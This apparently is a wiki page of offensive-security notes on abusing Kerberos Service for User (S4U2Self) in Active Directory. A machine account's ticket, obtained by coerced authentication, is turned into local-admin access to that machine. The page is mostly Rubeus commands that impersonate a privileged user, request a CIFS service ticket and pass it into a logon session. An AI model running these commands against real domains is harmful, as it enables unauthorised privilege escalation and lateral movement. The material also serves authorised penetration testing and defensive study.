Service for User (S4U) - CraigDonkin/Infrastructure GitHub Wiki
- Service for user (S4U)
- Service for user to self (S4U2Self)
- Allows a service to get a TGS to itself on behalf of a user
- Service for user to proxy (24U2Proxy)
- Allows a service to get a TGS on behalf of a user to a different service
-
If you have a TGT for a machine (
$) account, and pass the ticket into a logon session, you can't access the C$ share on the machine itself because machines don't have remote local admin access to themselves. So use this trick if you want to access a machine with their TGT remotely.- For example you coerced auth and have TGT of a machine account from something like petitpotam/spoolserver etc.
-
Use S4U2SELF with
/selfto get a TGS for a different user that has local admin to the server you're attacking
Rubeus.exe s4u /impersonateuser:<user to impersonate> /self /altservice:cifs/<server FQDN> /user:<machine account> /ticket:<TGT of machine account> /nowrap
- Then use
createnetonlywith the TGS
Rubeus.exe createnetonly /program:<program> /domain:<domain> /username:<username> /password:<fakepassword> /ticket:<TGS>
- If being run in a sacrificial logon session, the pass the ticket attack can be used.
Rubeus.exe s4u /impersonateuser:<user to impersonate> /self /altservice:cifs/<server FQDN> /user:<machine account> /ticket:<TGT of machine account> /nowrap /ptt